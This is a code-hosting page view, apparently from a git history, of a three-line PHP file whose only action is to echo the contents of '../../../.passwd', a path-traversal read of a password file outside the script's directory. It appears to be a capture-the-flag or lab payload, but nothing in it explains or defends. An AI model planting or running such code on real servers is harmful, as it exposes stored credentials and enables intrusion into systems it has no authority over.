6 lines
55 B
Plaintext
Raw Normal View History

2021-07-25 00:20:57 +02:00
<?php
echo file_get_contents("../../../.passwd");
?>